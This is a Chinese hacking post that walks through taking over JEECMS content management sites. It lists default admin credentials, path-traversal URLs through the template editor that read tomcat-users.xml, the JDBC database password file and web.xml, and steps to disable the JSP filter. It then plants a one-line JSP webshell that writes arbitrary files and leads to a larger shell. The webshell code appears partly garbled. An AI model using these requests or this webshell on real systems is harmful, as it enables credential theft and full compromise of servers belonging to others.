JEECMS编辑漏洞及随便拿webshell,啊哈哈

JEECMS是基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点 ・ 采用SpringMVC3+Spring3+Hibernate3+Freemarker主流技术架构 安全性做得非常变态,当网站安装完成后就不再允许执行任何目录下的jsp文件了(web.xml配置了过滤器禁止了很多种动态脚本)。



2.x后台:
login/Jeecms.do
3.x后台:
jeeadmin/jeecms/index.do

默认账户:admin
默认密码:password

获取tomcat密码:
/jeeadmin/jeecms/template/v_edit.do?root=../../conf/&name=../../conf/tomcat-users.xml

获取JDBC数据库账号密码:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2Fconfig%2F&name=%2FWEB-INF%2Fconfig%2Fjdbc.properties

ad84eb6855fbb2fb081c4fa04f4a20a44623dc39

JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../classes/jdbc.properties

e4528546fbf2b211e9c391fcca8065380dd78e07


修改web.xml取消对jsp的过滤:
/jeeadmin/jeecms/template/v_edit.do?root=%2FWEB-INF%2F&name=%2FWEB-INF%2Fweb.xml

8fa1dc43f21fbe09317ed4a66b600c338644add4

JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../web.xml

a19164fe43166d2202690226462309f79152d2d2

修改install/install_setup.jsp:
/jeeadmin/jeecms/template/v_edit.do?root=%2Finstall%2F&name=%2Finstall%2Finstall_setup.jsp

3236c63d5343fbf2ca4bb191b07eca8064388f89
JEECMS2.x版读取路径:
admin/core/template/Com_edit.do?relPath=\../../../../install\install_setup.jsp

55e151d3277f9e2f2b540aba1f30e924b999f38b


插入Jsp一句话:
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("

("f"))).write(request.getParameter("t").getBytes());
%>

修改后的一句话目录
/install/install_setup.jsp

一句话连接成功后的jsp大马目录:
/ma.jsp


0f877d61034f78f0fc518d4179310a55b2191c9d


注:

1:2.X 在后台可以上传媒体格式为jsp的文件

2:web.xml修改后需要重启服务器(自动加载更新的除外)
3:本文由 李听Hack 原创,转载请留名。


你可能感兴趣的:(数据库,过滤器,password,java技术,webshell)